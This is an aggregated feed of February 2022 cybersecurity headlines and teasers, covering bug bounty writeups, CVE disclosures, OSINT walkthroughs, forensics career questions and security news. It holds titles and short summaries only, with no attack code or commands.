• Open

    Inventing Anna, social engineering and OSINT: what is the outlook for the future when it comes to security…
    How much personal and intimate information do we share on social media spontaneously and without a second thought? Continue reading on Medium »  ( 3 min )
    Walkthrough — Hacktoria: Geolocation 13
    Thirteen. Unlucky for some. Let’s see how you could solve Hacktoria’s practice challenge: Geolocation 13. I confess I was very excited… Continue reading on Medium »  ( 3 min )
  • Open

    Analysis of CVE-2021-36260: Exploited in the Wild Hikvision Camera Vulnerability
    submitted by /u/chicksdigthelongrun [link] [comments]
    rconn - Consume services behind NAT or firewall without opening ports or port-forwarding
    submitted by /u/jafarlihi [link] [comments]  ( 1 min )
  • Open

    Interesting Stored XSS
    Hey there! My name is Faizan and this write up is about an interesting Stored XSS I found earlier today! If you know what an XSS aka Cross… Continue reading on Medium »  ( 1 min )
    Give me a browser, I’ll give you a shell
    A restricted browser, that’s all you have… what do you do? Continue reading on Medium »  ( 3 min )
    Burp Suite Tool — Overview and Usage
    Burp Suite is an intercepting tool which can be used to capture and manipulate all of the data traffic between Client and Server. This… Continue reading on Medium »  ( 2 min )
    Send a Email to me and get kicked out of Google Groups !!
    A Feature that almost broke Google Groups !! Continue reading on InfoSec Write-ups »  ( 3 min )
    How I make money with Hacking …
    Hello Everyone, This is Abhishek Kashniyal, I am a CSE student with specialization in Cyber Security & Forensics, a constant learner and… Continue reading on Medium »  ( 2 min )
    BugBounty: Algolia key disclosure vulnerability
    What is Algolia? Continue reading on Medium »  ( 1 min )
  • Open

    A bunch of rock music
    http://djbloom.info/Music/My%20Music/ submitted by /u/CalmWater8439 [link] [comments]  ( 1 min )
    I'm bad at coding. How do I create an Open Directory from scratch?
    Just what the title says. I have some music, movies, documents, etc that I'd like to share, but I don't want to take up or make an entire Google Drive account just for some files. Any help getting started would be greatly appreciated! submitted by /u/Reggie_Smith_89 [link] [comments]  ( 4 min )
  • Open

    I want to know what a day in the life looks like as an infosec analyst. Also, what would companies look for when hiring a junior infosec analyst
    What would a company look for when hiring junior infosec analysts? I just started as a junior help desk technician and I hear that experience is better than certs. I just want to get an idea of what a company will look for when hiring a junior infosec analyst. Also, is it possible to go from help desk to infosec? submitted by /u/Jkarl0880 [link] [comments]  ( 1 min )
    Any suggestions for gaining resume-worthy experience in cloud security?
    I pivoted from a technical security role to a customer facing technical/management role for a cybersecurity SaaS company a couple years ago. I’ve been considering getting back into the security engineering/architect side of things. One area I’m finding seems to be a requirement for most roles is experience in cloud security like mastery of AWS. I’m also noticing requirements for experience in container tools such as Kubernetes. This isn’t experience I can gain on the job right now. Any suggestions on how I can get experience that matters for these technologies? I don’t want to fall behind and lose any chance of working in a direct security role again submitted by /u/7heJoker [link] [comments]  ( 1 min )
    SAP CVE-2022-22536 technical analysis?
    Anybody by some chance has some sources on the new CVE of score 10 impacting SAP NetWeaver? I can't find any details of the specific vulnerable mechanism that allowed the request smuggling. Thanks :) submitted by /u/Altiverses [link] [comments]  ( 1 min )
    What are the prerequisite skills/knowledge for reverse engineering?
    Trying to learn reverse-engineering and binary exploitation and I came across this playlist. I watched a few videos but didn't get a thing; it feels like I'm missing some knowledge gaps in between. Can someone please give me a clear roadmap so that I can start using Radare2? Edit: after radare, I wanna learn Ghidra lol submitted by /u/The_Intellectualist [link] [comments]  ( 2 min )
    How is your day as an entry-level SOC
    I have recently interviewed for an entry-level SOC role, and my expectations are a bit mixed. It is a cybersecurity company that provides services such as SIEM monitoring, pen-testing, threat hunting, etc. The X company has 5 people, including the CEO and CTO, and around 300 customers. The role is to sit with the SOC team, check alerts, and then give customers a summary each quarter of what happened within that period. The job title was listed as a cyber security engineer, and the job description mentioned: Analysis of security incidents, Incident Response Teams, Threat Hunting, Security advice. During the interview, they asked me two times specifically how I felt about giving security advice to customers. Is it normal that the junior SOC gives security advice to customers? Or is this a good way to get into the "cyber world", then apply for new jobs after 1 year? Going to graduate with my BS this summer, so trying to land a job before I graduate. submitted by /u/PapiPoseidon [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-02-20 Review
    No news updates yet today~ For more of the latest articles, please visit SecWiki  ( 2 min )
  • Open

    Telegram vs Cellebrite
    "Telegram for iOS: Access and decode secret chats which can only be accessed on their devices of origin. You can also recover deleted messages." I'm in too deep; this forensic thingy is kinda exciting and I'm in a business major. I guess one can really recover deleted Telegram chats using Cellebrite! Amazing submitted by /u/b4dboyrere [link] [comments]  ( 1 min )
    Apple iCloud Productions
    What kind of data is included in Apple iCloud productions? Do they include permanently deleted files, notes, media? submitted by /u/b4dboyrere [link] [comments]  ( 1 min )
    jump from IT Audit into computer forensics
    Hello friends, to make things short, I am an IT Auditor with 1.5 years of experience, and I hate the part of dealing with people in IT Audit, but it's very essential to deal with people there. So I decided to jump to forensics. Do you people deal with humans or simply have to worry about machines and that is it? And I am CISA certified; will that help? What certification do you suggest taking for computer forensics? And how is the pay for IT Audit vs computer forensics? In short, do you recommend the shift or not? Thx submitted by /u/ItchyPilot9804 [link] [comments]  ( 2 min )
  • Open

    Self XSS in Create New Workspace Screen
    Mattermost disclosed a bug submitted by rynexxx: https://hackerone.com/reports/1442017 - Bounty: $50
  • Open

    The Red Cross Data Breach Exploited a ManageEngine Vulnerability by APT27
    Article URL: https://www.thecybersecuritytimes.com/the-red-cross-data-breach-exploited-a-manageengine-vulnerability-by-apt27/ Comments URL: https://news.ycombinator.com/item?id=30403952 Points: 1 # Comments: 1  ( 4 min )
  • Open

    Red Team Engagement Planning
    A short article outlining the phases to go through, while planning a red team engagement. Continue reading on Medium »  ( 2 min )

  • Open

    Privilege Escalation Vulnerability in Snapd
    Article URL: https://ubuntu.com/security/notices/USN-4728-1 Comments URL: https://news.ycombinator.com/item?id=30401324 Points: 1 # Comments: 0  ( 2 min )
  • Open

    Printer assigned a drive letter in Windows
    Has anyone else come across a printer that was assigned a drive letter? I’ve never seen this in my personal life but it stood out to me while I was working a case. In this instance, it was a Brother printer assigned to D:. Does doing this provide any additional functionality rather than just printing documents? submitted by /u/ebarboza311 [link] [comments]  ( 1 min )
    Missing $UsnJrnl
    Hi guys what can be the reason to not have a $UsnJrnl on an NTFS filesystem? submitted by /u/Donato_Francesco [link] [comments]  ( 1 min )
  • Open

    The ultimate guide to improving your competitive research on Google
    Do you want to improve your queries when researching your competitor or your market? Continue reading on Medium »  ( 3 min )
    Phishing Domain Tool — DnsTwist Part 2
    Dnstwist is an open-source tool used to identify phishing domains, Typosquatting domains, attack domains, and brand impersonate. Dnstwist… Continue reading on Medium »  ( 1 min )
    Walkthrough — Hacktoria: Geolocation 12
    And back again with another Hacktoria Geolocation challenge to solve. I love GEOINT challenges, especially when they force me to learn… Continue reading on InfoSec Write-ups »  ( 6 min )
  • Open

    "The installation of this device is forbidden by system policy"
    I keep getting these notifications without me trying to install any new device or driver. I would like to know what is the source of this? I tried to look into my event viewer without success. submitted by /u/ak_z [link] [comments]  ( 1 min )
    Small matter: A Malwarebytes Privacy Guard and Privacy Badger basically doing the same thing. I've had a problem with my browser sticking and it might be conflicting extensions.
    Thank you. submitted by /u/jacobspartan1992 [link] [comments]  ( 1 min )
    Which framework should I learn or at least get familiar with first? (Ghidra, IDA, Radare2)
    Hey Chief, I'm trying to get ahead in reversing binaries, and I really ain't got any idea about which framework should I pick up first, Can you help? submitted by /u/The_Intellectualist [link] [comments]  ( 2 min )
    Soc 2 report
    Why are SOC 2 reports made by CPAs? For SOC 1 I get it, but not SOC 2. How can they audit IT security being accountants? submitted by /u/Xctzn [link] [comments]  ( 2 min )
  • Open

    Windows Privilege Escalation: PrintNightmare
    Introduction Print Spooler has been on researchers’ radar ever since the Stuxnet worm used print spooler’s privilege escalation vulnerability to spread through the network in nuclear The post Windows Privilege Escalation: PrintNightmare appeared first on Hacking Articles.  ( 9 min )
  • Open

    SecWiki News 2022-02-19 Review
    No news updates yet today~ For more of the latest articles, please visit SecWiki  ( 2 min )
  • Open

    Querying Spotlight APIs With JXA
    TL;DR This blog post takes a brief look at how to use JXA (native JavaScript for Automation on macOS) to query Spotlight APIs. In… Continue reading on Medium »  ( 3 min )
    Attacktive Directory — THM
    Attacktive Directory is a box hosted on Try Hack Me. This is a medium-rated box, but great for any new Red Team Member or penetration… Continue reading on Medium »  ( 2 min )
  • Open

    Directory Traversal — what is it?
    Local File inclusion Continue reading on System Weakness »  ( 3 min )
    PORTSWIGGER WEB SECURITY - SSRF (SERVER SIDE REQUEST FORGERY) LAB SOLUTIONS
    If the data used in a web application is retrieved via an external source and the attacker, the request sent by the web server… Continue reading on Medium »  ( 7 min )
  • Open

    Certipy 2.0: BloodHound, New Domain Privilege Escalation Techniques, Shadow Credentials, Golden Certificates, and more!
    submitted by /u/ly4k_ [link] [comments]
  • Open

    pictures of people playing motorcycle soccer
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    Analyzing a PJL directory traversal vulnerability – exploiting the Lexmark MC3224i printer (part 2)
    submitted by /u/digicat [link] [comments]
  • Open

    Expat library: libexpat 2.4.5 (CVE fixes)
    Article URL: https://github.com/libexpat/libexpat/blob/R_2_4_5/expat/Changes Comments URL: https://news.ycombinator.com/item?id=30393397 Points: 1 # Comments: 0  ( 21 min )

  • Open

    Microsoft Brings eBPF to Windows unlocking security and networking use cases
    submitted by /u/markcartertm [link] [comments]  ( 1 min )
    Personnel Security, Separation of Duties, Least Privilege, Need to Know, Vendor, Consultant and Contractor Controls, Security Governance, Risk Management
    submitted by /u/Tradition_Wonderful [link] [comments]
    Oh Snap! More Lemmings (Local Privilege Escalation in snap-confine)
    submitted by /u/0xdea [link] [comments]  ( 1 min )
    AWS GuardDuty Exfiltration Bypass with VPC Endpoints
    submitted by /u/d_o_d_o_ [link] [comments]  ( 1 min )
    Extensis Portfolio - Remote Code Execution Vulnerability Disclosure
    submitted by /u/hashput1n [link] [comments]
  • Open

    What is it like to work a computer forensics job?
    What is working a computer forensics job like? Is it as simple as just plugging in a hard drive or phone or anything that needs data recovery to retrieve data back, or is it much harder and more work? Just wondering because I am a computer science major, currently a freshman; I might want to do computer forensics because it interests me. submitted by /u/Ill-Date-1852 [link] [comments]  ( 2 min )
    Where does deleted browser history go to?
    I know when u delete something, it never really gets deleted. So just curious, where does cleared browsing history for Chrome/Safari go to? And are we able to retrieve it? submitted by /u/b4dboyrere [link] [comments]  ( 1 min )
    How do you really get into incident response
    I have recently graduated from college with a Bachelors in df but the school I went to really was more geared towards what police officers deal with (like criminal activity and all). How should I really go about learning more of the incident response side of forensics? Any good references to YouTube channels, textbooks, websites, etc is much appreciated! submitted by /u/JunketThat2134 [link] [comments]  ( 5 min )
  • Open

    eCPTX Exam Review
    eLearnSecurity Certified Penetration Tester eXtreme Continue reading on The Mayor »  ( 4 min )
    AWS GuardDuty Exfiltration Bypass
    On January 20, 2022, Amazon AWS introduced a new threat detection in GuardDuty to block credential exfiltrations. Can it be bypassed? Continue reading on Dev Genius »  ( 4 min )
    AWS GuardDuty Exfiltration Bypass
    On January 20, 2022, Amazon AWS introduced a new threat detection in GuardDuty to block credential exfiltrations. Can it be bypassed? Continue reading on Medium »
  • Open

    Is it possible to bulk download?
    So there's an album I'm wanting to download from an OD (Queen's complete Platinum Collection which includes over 200 mins of music) and I'm wanting to know if there is a way to go and bulk download all the files without having to press a link, right click, and click "Save audio as..." every time. submitted by /u/Raven_Claw7621 [link] [comments]  ( 1 min )
    Software (Not Tested)
    https://fichiers.meca.polymtl.ca/?hidden submitted by /u/CalmWater8439 [link] [comments]
    Quake 3 Arena/OpenArena maps and other goodies
    submitted by /u/SpaceOtterMafia [link] [comments]  ( 1 min )
    Best way to limit results by language?
    Greetings! I am currently new to the usage of open directories and have been wondering how to limit my results for a movie, for example, to only my language. I am using the "all resources I know" guide to construct my searches. Example: intext:"Search Term" intitle:"index.of" +(wmv|mpg|avi|mp4|mkv|mov) -inurl:(jsp|pl|php|html|aspx|htm|cf|shtml) The Guide: https://www.reddit.com/r/opendirectories/comments/933pzm/all_resources_i_know_related_to_open_directories/ submitted by /u/TwinkleTheToothFairy [link] [comments]  ( 1 min )
  • Open

    Severe Vulnerability Fixed in UpdraftPlus 1.22.3
    Article URL: https://jetpack.com/2022/02/17/severe-vulnerability-fixed-in-updraftplus-1-22-3/ Comments URL: https://news.ycombinator.com/item?id=30391454 Points: 1 # Comments: 1  ( 4 min )
    Local root vulnerability in snap-confine
    Article URL: https://lwn.net/Articles/885195/ Comments URL: https://news.ycombinator.com/item?id=30381169 Points: 2 # Comments: 0  ( 10 min )
  • Open

    Hacking the marketplace
    Guys! This room is great and I had a lot of fun; with this room you can learn this: Continue reading on System Weakness »  ( 2 min )
    Recon and YouTube, is that a thing?
    Hey fellow hunters, hope you all are doing fine. This is my first ever blog, I will try to keep it as simple as possible, spilling as… Continue reading on Medium »  ( 4 min )
    How i was able To hack Cambridge University ( Arabic )
    Peace be upon you, this is your brother Nasser. Because of your earlier support for me, I decided to write this article Continue reading on Medium »  ( 1 min )
    Bug Zero is Going to Pay Your Security Bill for 2022
    tl;dr — Bug Zero is a Sri Lanka based Bug Bounty platform and is here to help secure your organization from cybersecurity threats. Continue reading on Bug Zero »  ( 2 min )
    Bug Bounties in Sri Lanka
    tl;dr — Bug Zero is a Sri Lanka based Bug Bounty platform and is here to help secure your organization from cybersecurity threats. Continue reading on Bug Zero »  ( 5 min )
    Cardano Foundation Doubles Reward Offered to Hackers for Uncovering Bugs on Its Blockchain
    Continue reading on Medium »  ( 2 min )
    Results of the Firefly security audit
    Original: https://firefly.exchange/blog/results-from-firefly-security-audits Continue reading on Medium »  ( 2 min )
    I’ve made over $588k on Bug Bounty so far
    How much one can earn on Bug Bounty? Continue reading on Medium »  ( 1 min )
    How I took over the Manager’s account in Bus Booking website.
    Hey fellow hackers and Bug hunters, Continue reading on InfoSec Write-ups »  ( 2 min )
    Starswap’s Second Bug Bounty Program
    Starswap is already live on Starcoin’s test network, barnard, as the first step in realizing our ambitious vision of a fully functional… Continue reading on Medium »  ( 1 min )
  • Open

    Android
    VK.com disclosed a bug submitted by executor: https://hackerone.com/reports/1343528 - Bounty: $3000
  • Open

    Free cybersecurity frameworks to try?
    I am just looking around to see if there are any more frameworks I can use to harden our systems. I have already been using the STIG and CIS tools and am about 85% compliant on both. Are there any more free resources I can use to scan against our machines to see if there is anything else I can do to harden them? Thanks submitted by /u/KillingRyuk [link] [comments]  ( 2 min )
    I believe my files were stolen whilst connected to a hacker's personal network, but something doesn't add up. [NSFW]
    So, a friend of mine is in Cybersecurity. I study Cybersecurity and am less advanced in my journey than he is. He's very much into fraud, malware, spyware, etc. So, a few background things - I have anorexia nervosa. He knows this. We have been friends for over 3 years now. We are friends with benefits. We are both meth addicts and I'm heavily dependant on weed. I have an album on my phone containing all my bodychecks. It is stored in the main SD card directory. I have a Samsung Galaxy S20 5G, running Android 11. So one day, he invited me over to record a sex tape. Okay, whatever. So I went to his house, ended up sucking his dick, he finishes. We chat for a bit, I'm in his loungeroom on his couch for a an hour or so. At one point early on I mention that I am downloading a large file onto my phone. He asks if I want to use his Wi-Fi, and I accept. When I'm connecting, he convinces me to use my phone MAC address. Okay. I try to browse the Internet while I wait but the connection is garbage. I recieve a text from our other friend who wants to buy weed off me. He immediately ushers me out the door despite suggestions of a Round 2 earlier. Later that night, I notice that when posting to my Instagram, all the recent photos are my bodychecks. Despite me not having touched that folder at all in the past six months. All the photos are there, twice - in my recent photos and where they originally were. I cannot find any duplicate albums on my phone that would cause this. This all happened last week, but the files were modified again last night. Should I be worried? submitted by /u/856850835 [link] [comments]
    Security Metrics
    So I'm working on a security project now and we have a bunch of issues that need fixing over a number of areas and I need a way of prioritising these items and showing that the security of the system is improving. Normally you would use CVSS to calculate this however this program won't be dealing with just vulnerabilities in the product but also in operations and governance. How do you prioritise updating a library in your product with an RCE against a GDPR issue or an internal tool with weak password policies? Also how do you score the system overall to show that fixing these issues has improved the overall security posture? submitted by /u/dbxp [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-02-18 Review
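    Attacking TCP traffic using IP fragment poisoning by ourren; "Red-Blue Adversarial Exercise Scoring System" open-source framework (preview) by ourren; Effectiveness of CSRF defenses in web frameworks by ourren; PRIVGUARD: a data governance framework for GDPR privacy compliance by ourren; The middleman: analysis of Ntlm Relay attacks by ourren; The "3 protections, 1 assessment" you must understand for cybersecurity work by ourren; For more of the latest articles, please visit SecWiki  ( 2 min )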
  • Open

    Hacktoria: Geolocation 10 (Walkthrough)
    Hacktoria: Geolocation 10 (Walkthrough) Continue reading on Medium »  ( 2 min )
    Tattoos for Buildings — OSINT Challenge 17
    On Jan 24, 2022, Quiztime (contributor @bayer_julia) shared a new OSINT quiz with us. The objective was simple. We had to figure out when… Continue reading on Medium »  ( 2 min )
    OSINT: How extract text From an Image or Video
    Did you ever wonder what a piece of foreign text means on a sign, banner, or in a video? Sure you can type it into Google Translate or speak… Continue reading on Medium »  ( 2 min )
  • Open

    How Netsparker can help with AppSec compliance
    Demonstrating web application compliance with various security standards and practices is crucial in many industries. To help you scan applications and prepare reports for common web security compliance requirements, Netsparker by Invicti comes with a host of predefined compliance checks and reports, including OWASP Top 10, PCI DSS, HIPAA, NIST SP 800-53, and more. READ MORE  ( 7 min )
  • Open

    Just 7 Days Left for IWCON2022. Have You Registered Yet?
    Infosec Writeups is Organizing Our First Virtual Conference and Networking Event — and we want you to be a part!  ( 3 min )
    CyberDefenders Qradar101 Write-up
    This write-up is based on Cyberdefenders Qradar101 challenge from Ali Alwashali.  ( 7 min )
    How I took over the Manager’s account in Bus Booking website.
    Hey fellow hackers and Bug hunters,  ( 2 min )
  • Open

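    FreeBuf Morning News | Meta pays 90 million US dollars over privacy case; Google launches new privacy protection policy
    Facebook's parent company Meta has agreed to pay 90 million US dollars to settle a lawsuit from ten years ago.  ( 1 min )
    A Golang-based botnet is becoming a new threat
    Recently, cybersecurity researchers cracked a new botnet named Kraken. The botnet is developed in the Golang language, and hackers are actively optimizing and upgrading it.
    Google announces it will introduce the "Privacy Sandbox" into the Android system
    Google announced on Wednesday that it plans to bring the Privacy Sandbox to Android, in the hope of extending advertising technology that is both privacy-focused and non-intrusive to users to the mobile web.
    Ransomware is rampant: 623 million detections in 2021
    IoT malware, encrypted threats, cryptojacking and the like all maintained rapid growth throughout the year.  ( 1 min )
    FreeBuf Weekly | Internet Society data leak; Ukraine hit by large-scale DDoS attack
    Ukraine's national security agency (SSU) claims that this cyberattack against Ukraine was a premeditated, organized, concrete operation with a huge "black hand" behind it.  ( 1 min )
    Hackers infiltrate Microsoft Teams to send malware
    Hackers are exploiting Microsoft Teams and spreading malicious executable files in chats.
    FreeBuf Party-A group topic discussion | Let's talk about personal data privacy in enterprise security operations
    As an enterprise's security department, while ensuring that the enterprise operates securely and stably, how do you protect the private data of every "transparent person" in the era of platform data?
    A giant gives way! Meta will pay 90 million US dollars
    The case accuses Meta of using cookies to track Facebook users who had logged out of their accounts.  ( 1 min )
    Hackers say they are very interested in your vibrating egg
    Vibrating eggs and massage wands are your late-night companions; they may also be quietly leaking your usage data.  ( 1 min )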
  • Open

    Why symbolic execution is the leading-edge method for generating test values
    In the first blog post of our blog series on Symflower’s Core Technology, we explained how symbolic execution works and how we apply it to… Continue reading on Medium »  ( 5 min )
  • Open

    Watch "C0V3RT - "Just For Fun" Challenge Lock (Picked & Gutted)" on YouTube
    submitted by /u/Can0pen3r [link] [comments]
  • Open

    Internals of Go's new fuzzing system
    Article URL: https://jayconrod.com/posts/123/internals-of-go-s-new-fuzzing-system Comments URL: https://news.ycombinator.com/item?id=30380994 Points: 2 # Comments: 0  ( 6 min )

  • Open

    Would you support brain forensics (mind reading)
    Poll View Poll submitted by /u/themariocrafter [link] [comments]  ( 1 min )
    Who is running sysmon on workstations and forwarding to SIEM?
    Hi Just wondering if any enterprise size companies are running sysmon on workstation and/or servers and forwarding the event to some sort of logger/SIEM? What are the pros and cons? submitted by /u/antmar9041 [link] [comments]  ( 1 min )
    PDF Analysis for adult content
    I have a PDF that consists of ~27,000 pages and >42,000 images (it's a Cellebrite extraction report from an iPhone). I need to know how many of the images are "adult" in nature. I know Google (https://cloud.google.com/vision/docs/detecting-safe-search) and Microsoft (https://docs.microsoft.com/en-us/azure/cognitive-services/computer-vision/concept-detecting-adult-content) both have "A.I." based image filtering API's that can automatically scan images and find adult/gore/explicit images, but I'm not aware of any software that leverages these technologies (or something similar). What I'm looking for: 1. The best way to dump this many images from a PDF file, and 2. The best way to scan that dump for explicit images (or a way to just scan the PDF file directly and skip dumping the images). submitted by /u/agrowland [link] [comments]  ( 3 min )
  • Open

    How to track vehicles using Open Souce Imagery
    Vehicle information can be a fantastic tool for investigators to scrutinize and track a real world target, but what OSINT opportunities can… Continue reading on Medium »  ( 2 min )
    Hacktoria: Geolocation 14 (Walkthrough)
    Hacktoria: Geolocation 14 (Walkthrough) Continue reading on Medium »  ( 3 min )
    Solving Dojo’s geolocation quiz
    One day, when I was surfing the internet, my Twitter pushed me a tweet; let's see what the tweet says: Continue reading on Medium »  ( 2 min )
    OSINT Tool - CarNet.ai
    The best tool to (correctly!) identify a vehicle’s brand and model using AI. Continue reading on Medium »  ( 2 min )
  • Open

    Why should you not send sensitive data over email
    Currently the company I work for sends sensitive documents over email. They password-protect them but then send the password also using email format. submitted by /u/Linux98 [link] [comments]  ( 3 min )
    Is it safe to send my SSN over email to a Loan officer email, since she will need it to open up my credit report?
    My mom and I are in the process of trying to buy an apartment together. Mom will put it under my name. This is the first time I'm doing this and she told me I needed to email my SSN to the loan officer. I have ProtonMail, which is secure mail and is encrypted email. Would it be safe to send my SSN over email to the loan officer in this case, since she would need it to open my credit report? I do not know if the loan officer's email is encrypted or not. Or should I give her my SSN in another way, such as telling her on a phone call, to be on the safe side? Or would email be just fine? submitted by /u/Wastedmess [link] [comments]  ( 3 min )
    Regarding changing passwords and NIST (My google-fu is failing me)
    NIST states in NIST Special Publication 800-63B under section 5.1.1.2 Memorized Secret Verifiers that: "Verifiers SHOULD NOT impose other composition rules (e.g., requiring mixtures of different character types or prohibiting consecutively repeated characters) for memorized secrets. Verifiers SHOULD NOT require memorized secrets to be changed arbitrarily (e.g., periodically). However, verifiers SHALL force a change if there is evidence of compromise of the authenticator. " I'm a real stickler and was wondering if anyone knows what main research papers or investigations made them come to the recommendations above? Additionally are there any respected research authority on these type of questions in IT-sec? Thanks! submitted by /u/someuserman [link] [comments]  ( 3 min )
    Company Phone in Sealed Box - Possible to be Monitored?
    Just got my company phone and it’s brand new in the sealed manufacturers box and even has the carriers sticker on it still. Is there any possible way my company could be monitoring my activity on this phone beyond the calls being made and quantity of texts/data usage? submitted by /u/sektrONE [link] [comments]  ( 3 min )
  • Open

    Self-Testing: Red Team Augmentation
    Red Team testing and Penetration testing are key controls to utilize as part of maintaining a mature security program. There is the… Continue reading on Medium »  ( 5 min )
  • Open

    Local Privilege Escalation Vulnerability Discovered snap-confine(CVE-2021-44731)
    Article URL: https://blog.qualys.com/vulnerabilities-threat-research/2022/02/17/oh-snap-more-lemmings-local-privilege-escalation-vulnerability-discovered-in-snap-confine-cve-2021-44731 Comments URL: https://news.ycombinator.com/item?id=30378103 Points: 2 # Comments: 1  ( 5 min )
    Zabbix SAML Authentication Bypass (CVE-2022-23131) and more
    Article URL: https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage/ Comments URL: https://news.ycombinator.com/item?id=30372198 Points: 2 # Comments: 0  ( 9 min )
  • Open

    T2 Mac security vulnerability means passwords can now be cracked
    Article URL: https://9to5mac.com/2022/02/17/t2-mac-security-vulnerability-passware/ Comments URL: https://news.ycombinator.com/item?id=30374224 Points: 32 # Comments: 6  ( 4 min )
  • Open

    Top 10 API Bugs — Where To Find Them
    Ladies and Gentlemen, let’s do some API hacking today. I will discuss some of the top 10 API bugs and where one can find them. Continue reading on Medium »  ( 5 min )
    403 forbidden bypass & Accessing config files using a header
    This is my first writeup on how I bypassed 403 & accessed the config file Continue reading on Medium »  ( 1 min )
    Beginner’s Guide to Bug Bounty Hunter
    How much money can you make as a bug bounty hunter? That’s the burning question on everyone’s mind, and it’s one that will take some time… Continue reading on Medium »  ( 3 min )
    Apple pays $100,500 to a student who discovered Mac webcam vulnerability
    Ryan Pickren, a cyber security student was awarded $100,500 (around 75 lakhs) as a bounty, after he showed Apple how a vulnerability… Continue reading on Medium »  ( 2 min )
    Bug Bounty: Should You Go Full-Time?
    In the comments, I was asked what turned out to be more profitable in terms of money as a result — my previous job as a developer or… Continue reading on Medium »  ( 2 min )
  • Open

    Learning secrets management in the modern world using OWASP WrongSecrets Project : Hands-on Labs, CTF style challenges
    submitted by /u/madhuakula [link] [comments]  ( 1 min )
    Exploiting Jenkins build authorization
    submitted by /u/Alternative_Tour9985 [link] [comments]
    Tutorial: Kubernetes Vulnerability Scanning & Testing KubiScan & KubeSploit
    submitted by /u/jat0369 [link] [comments]
    CVE-2022-23131 - Zabbix SAML Authentication Bypass
    submitted by /u/monoimpact [link] [comments]  ( 1 min )
    Advisory: Cisco RV340 Dual WAN Gigabit VPN Router (RCE over LAN)
    submitted by /u/g_e_r_h_a_r_d [link] [comments]
  • Open

    SecWiki News 2022-02-17 Review
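    A Large-Scale Study of Malicious Plugins in the WordPress Ecosystem by Avenger; 2021 Industrial Control Network Security Situation White Paper by ourren. For more of the latest articles, visit SecWiki  ( 2 min )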
  • Open

    Subdomain Takeover of brand.zen.ly
    Zenly disclosed a bug submitted by mega7: https://hackerone.com/reports/1474784 - Bounty: $750
    Missing SPF record on trycourier.app
    Courier disclosed a bug submitted by musab_alharany: https://hackerone.com/reports/1416701
  • Open

    Browser Forsensics — CyptoMiner
    Challenge Description  ( 3 min )
    Phishing: Creating and Analyzing
    Hello everyone,  ( 11 min )
    Memory Analysis — Ransomware (BlueTeamLabs)
    Challenge Description:  The Account Executive called the SOC earlier and sounds very frustrated and angry. He stated he can’t access any…  ( 3 min )
  • Open

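    US says Russian state hackers breached defense contractors
    Russian hacking groups have reportedly carried out sustained attacks on US CDCs.  ( 1 min )
    Beware: the upcoming Chrome and Firefox 100 may carry serious risks
    The upcoming Firefox 100 and Chrome 100 browser releases carry a serious risk: websites may break when parsing user-agent strings that contain a three-digit version number.  ( 1 min )
    schoolcms code audit
    I have been studying the thinkphp framework lately; today I picked a CMS to audit and found two injection points, which I analyze here.  ( 1 min )
    Will machine learning become a new threat and backdoor for data security?
    Experts who study the security of machine learning and artificial intelligence systems warn that such systems could be exploited by skilled attackers in the future.  ( 1 min )
    FreeBuf Morning Report | US says Russian hackers breached multiple Department of Defense contractors; Trickbot targets customers of 60 well-known companies
    The International Committee of the Red Cross (ICRC) was recently hit by a cyberattack that exposed the data of more than 515,000 “highly vulnerable people”, most likely the work of state-backed hackers.  ( 1 min )
    Is full pixelation safe? A new technique can recover text from pixelated images
    This week, the lead researcher at security firm Bishop Fox clearly recovered the letters from a pixelated image of text.  ( 1 min )
    The 10 hottest XDR security companies to watch in 2022
    Note: this article is reposted from SDNLAB, for reference only. According to research firm Forrester, the extended detection and response (XDR) market is still at an early stage, and existing  ( 1 min )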

  • Open

    Broken Authentication Session Token Bug
    Courier disclosed a bug submitted by the_hacker_girl: https://hackerone.com/reports/948345
  • Open

    Company refuses to provide any training for our SOC
    Since joining multiple analysts have requested some type of training whether it’s vendor specific for tools like the SIEM or vendor neutral training such as SANS but management keeps saying our department is “self-taught” and there is no training budget. Which is odd considering how big of a corporation it is and how successful it is. Personally I’m shocked as the companies I’ve worked for in the past all provided some type of training. How can I make a compelling case for getting our SOC analysts training? submitted by /u/bankster24 [link] [comments]  ( 2 min )
    what are some affordable and credible penetration testing certifications?
    I am a new penetration tester and I want to gather some certifications for me to be able to further my career. However, I have observed that cybersecurity certifications are particularly expensive; for example, the Certified Ethical Hacker (CEH) certification costs 1200 USD, which is a lot since I am planning to pay for them myself. I recently saw elearnsecurity, particularly the eJPT, and it only costs 200 USD, which I think is great since it shows that I have some real-world, hands-on capabilities as a penetration tester. So are there any other certifications like the eJPT which are affordable and credible? Preferably around the same price as the eJPT, or better, lower. Thank you submitted by /u/darkalimdor18 [link] [comments]  ( 3 min )
    Book recommendations
    Looking for some good books to study up on foundational Network Concepts and maybe some stuff that could help me prepare for Network+ submitted by /u/Wintermane45 [link] [comments]
  • Open

    What makes a great incident response engineer?
    submitted by /u/Real_Score_5035 [link] [comments]  ( 1 min )
    QUESTION: confiscated phone asks to update whatsapp
    Good afternoon, My local department wants to manually check whatsapp messages on a phone. The phone has been in flight mode since we've confiscated it. We ran into the issue that when we want to launch whatsapp it asks to update the whatsapp software. If we want to do this, it means that we'll have to hook it up to our wifi network. Does this mean that if the suspect has deleted his messages through whatsapp.web / other phone that this will also be synched with the whatsapp on the phone? I also believe that whatsapp is linked to a phone number. So it would rather be impossible for the suspect to get on his whatsapp without his sim-card (this is in our possession as well). We also use the UFED cellebrite, but whatsapp conversations don't always come through. So what are our options to be able to get back into whatsapp without loss of data? Thanks! submitted by /u/Tniso [link] [comments]  ( 1 min )
  • Open

    Lodestar Joins the Consensus Layer Bug Bounty
    ChainSafe is happy to announce that we’ve been added to the Ethereum Foundation’s consensus layer bug bounty program for Lodestar, our… Continue reading on ChainSafe »  ( 1 min )
    File Inclusion Vulnerabilities - Cyber Sapiens Internship Task-19
    Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly… Continue reading on Medium »  ( 2 min )
    Insecure Direct Object Reference- Cyber Sapiens Internship Task-18
    Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly… Continue reading on Medium »  ( 4 min )
    No Rate Limiting Vulnerability & Bypasses - Cyber Sapiens Internship Task-17
